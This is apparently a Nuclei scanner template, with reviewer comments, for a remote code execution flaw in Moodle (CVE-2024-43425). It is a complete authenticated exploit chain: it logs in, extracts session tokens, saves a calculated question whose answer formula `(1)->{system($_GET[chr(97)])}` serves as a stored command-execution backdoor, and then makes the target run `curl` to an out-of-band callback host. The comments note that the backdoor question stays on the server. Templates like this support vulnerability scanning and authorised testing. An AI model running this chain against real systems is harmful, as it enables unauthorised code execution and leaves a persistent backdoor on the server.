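# Nuclei template for CVE-2024-43425 (Moodle calculated-question RCE).
#
# NOTE(review): this is an intrusive, authenticated check, not a passive probe:
#   * http(1) logs in with {{username}} / {{password}}; both must be supplied
#     (e.g. `-var username=... -var password=...`) and the account needs
#     permission to create questions in at least one course.
#   * http(4) saves a calculated question (name "aaaaaaa") whose answer
#     formula is `(1)->{system($_GET[chr(97)])}`, i.e. system($_GET['a']).
#     Nothing in this template deletes that question afterwards, so it stays
#     in the target's question bank as a reusable command-execution primitive
#     until removed by hand.
#   * http(6) really runs `curl <interactsh-url>` on the target. The match
#     depends on the host having outbound HTTP egress; blocked egress gives a
#     false negative on a vulnerable instance.
#   * `category=2,11` and `returnurl=...courseid=2...` in http(4)/http(5) are
#     hard-coded (presumably a default install) while `courseid` itself is
#     extracted in http(3) - TODO confirm against the target if http(4) does
#     not redirect with an `id=` parameter.
id: CVE-2024-43425

info:
  name: Moodle - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.
  impact: |
    Authenticated attackers with question creation permissions can craft malicious calculated questions to execute arbitrary commands on the underlying system.
  remediation: |
    Apply security patches for Moodle addressing CVE-2024-43425.
  reference:
    - https://github.com/RedTeamPentesting/moodle-rce-calculatedquestions
    - https://blog.redteam-pentesting.de/2024/moodle-rce/
    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-009/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43425
  classification:
    cvss-score: 9.8
    cve-id: CVE-2024-43425
    epss-score: 0.89363
    epss-percentile: 0.99523
    cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Moodle"
    product: moodle
    vendor: moodle
  tags: cve,cve2024,moodle,rce,authenticated,vuln

# Every step must succeed for the next one to run; a failed login or a
# missing course simply stops the chain without a finding.
flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6)

http:
  # http(1): fetch the login form for its CSRF token, then log in with it.
  - raw:
      - |
        GET /login/index.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /login/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        anchor=&logintoken={{token}}&username={{username}}&password={{password}}

    host-redirects: true
    extractors:
      - type: regex
        part: body
        name: token
        group: 1
        regex:
          - 'name="logintoken" value="([a-zA-Z0-9]+)">'
        internal: true

  # http(2): any authenticated page exposes the session key needed for
  # state-changing requests below.
  - raw:
      - |
        GET /my/courses.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: sesskey
        part: body
        internal: true
        group: 1
        regex:
          - '"sesskey":"([^"]+)"'

  # http(3): pick the first course the account is enrolled in. If the
  # account has no courses the extractor yields nothing and the flow stops.
  - raw:
      - |
        POST /lib/ajax/service.php?sesskey={{sesskey}}&info=core_course_get_enrolled_courses_by_timeline_classification HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        [{"index":0,"methodname":"core_course_get_enrolled_courses_by_timeline_classification","args":{"offset":0,"limit":0,"classification":"all","sort":"fullname","customfieldname":"","customfieldvalue":"","requiredfields":["id","fullname","shortname","showcoursecategory","showshortname","visible","enddate"]}}]

    extractors:
      - type: json
        part: body
        name: courseid
        json:
          - ".[].data.courses[0].id"
        internal: true

  # http(4): create the calculated question. answer[0] is the URL-encoded
  # formula `(1)->{system($_GET[chr(97)])}`; the new question id is taken
  # from the redirect Location header.
  - raw:
      - |
        POST /question/bank/editquestion/question.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        initialcategory=1&reload=1&shuffleanswers=1&answernumbering=abc&mform_isexpanded_id_answerhdr=1&noanswers=1&nounits=1&numhints=2&synchronize=&wizard=datasetdefinitions&id=&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&qtype=calculated&makecopy=0&sesskey={{sesskey}}&_qf__qtype_calculated_edit_form=1&mform_isexpanded_id_generalheader=1&mform_isexpanded_id_unithandling=1&mform_isexpanded_id_unithdr=1&mform_isexpanded_id_multitriesheader=1&mform_isexpanded_id_tagsheader=1&category=2%2C11&name=aaaaaaa&questiontext%5Btext%5D=%3Cp%3Edsaszzzzzzzzda%3C%2Fp%3E&questiontext%5Bformat%5D=1&questiontext%5Bitemid%5D=471779994&status=ready&defaultmark=1&generalfeedback%5Btext%5D=&generalfeedback%5Bformat%5D=1&generalfeedback%5Bitemid%5D=318048148&idnumber=&answer%5B0%5D=%281%29-%3E%7Bsystem%28%24_GET%5Bchr%2897%29%5D%29%7D&fraction%5B0%5D=1.0&tolerance%5B0%5D=0.01&tolerancetype%5B0%5D=1&correctanswerlength%5B0%5D=2&correctanswerformat%5B0%5D=1&feedback%5B0%5D%5Btext%5D=&feedback%5B0%5D%5Bformat%5D=1&feedback%5B0%5D%5Bitemid%5D=238751667&unitrole=3&penalty=0.3333333&hint%5B0%5D%5Btext%5D=%3Cp%3Eas%3C%2Fp%3E&hint%5B0%5D%5Bformat%5D=1&hint%5B0%5D%5Bitemid%5D=653998899&hint%5B1%5D%5Btext%5D=&hint%5B1%5D%5Bformat%5D=1&hint%5B1%5D%5Bitemid%5D=161289221&tags=_qf__force_multiselect_submission&submitbutton=Save+changes

    extractors:
      - type: regex
        part: header
        name: id
        group: 1
        internal: true
        regex:
          - "&id=([0-9]+)&"

  # http(5): advance the question wizard to the dataset-items step. The
  # redirect target (everything between `/question/` and `&returnurl` in
  # the Location header) is the page on which the formula gets evaluated.
  - raw:
      - |
        POST /question/bank/editquestion/question.php?wizardnow=datasetdefinitions HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        id={{id}}&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&category=2%2C11&wizard=datasetitems&sesskey={{sesskey}}&_qf__question_dataset_dependent_definitions_form=1&dataset%5B0%5D=0&synchronize=0&submitbutton=Next+page

    extractors:
      - type: regex
        part: header
        name: rceurl
        group: 1
        internal: true
        regex:
          - "Location: https?://.*?/question/(.*)&returnurl"

  # http(6): load that page with `a=curl <interactsh-url>`, which the stored
  # formula passes to system(). A finding requires both an HTTP callback
  # from the target and a 200 from the page itself.
  - raw:
      - |
        GET /question/{{rceurl}}&a=curl%20{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200

# Upstream template signature. It is computed over the template content, so
# any edit to this file leaves it stale - re-sign it, or expect nuclei to
# report the template as unsigned/unverified.
# digest: 4a0a00473045022030207be922b7696e0fc937a996ab97825edcbeeb658287cf4d5a5e09a4336c7702210096a60ae2ae342daa4db3fa51b77ae569860a5f92590d97f489b07a10ecf00534:922c64590222798bb761d5b6d8e72950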